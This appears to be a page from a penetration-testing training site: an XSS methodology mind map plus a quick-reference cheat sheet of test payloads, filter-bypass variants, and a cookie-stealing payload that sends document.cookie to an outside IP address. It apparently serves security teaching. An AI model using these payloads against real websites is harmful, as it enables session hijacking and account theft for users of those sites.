Dashboard > Mind Maps > XSS Attack Methodology

XSS Attack Methodology

Finding and exploiting Cross-Site Scripting

Cross-Site Scripting (XSS)

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Input Vector] --> B[Inject Probe] B --> C{Reflected?} C -->|Yes| D[Test Filters] C -->|No| E[Check Stored] D --> F[Bypass Filters] F --> G[Inject Payload] G --> H[Cookie Stealing] G --> I[Redirection] G --> J[Phishing]

MODULES Related Modules

Cross-Site Scripting (XSS)

Finding and exploiting XSS vulnerabilities....

Web

REF Quick Reference

Test Payloads

<script>alert(1)</script> # Basic script tag payload
<img src=x onerror=alert(1)> # Image tag with onerror event
<svg onload=alert(1)> # SVG tag with onload event

Cookie Stealing

<script>new Image().src='http://10.10.14.5/?c='+document.cookie</script> # Steal cookies via image request

Filter Bypass

<ScRiPt>alert(1)</ScRiPt> # Bypass case-sensitive filters
<img src=x onerror=alert`1`> # Bypass parenthesis filters
Back to Mind Maps View Full Module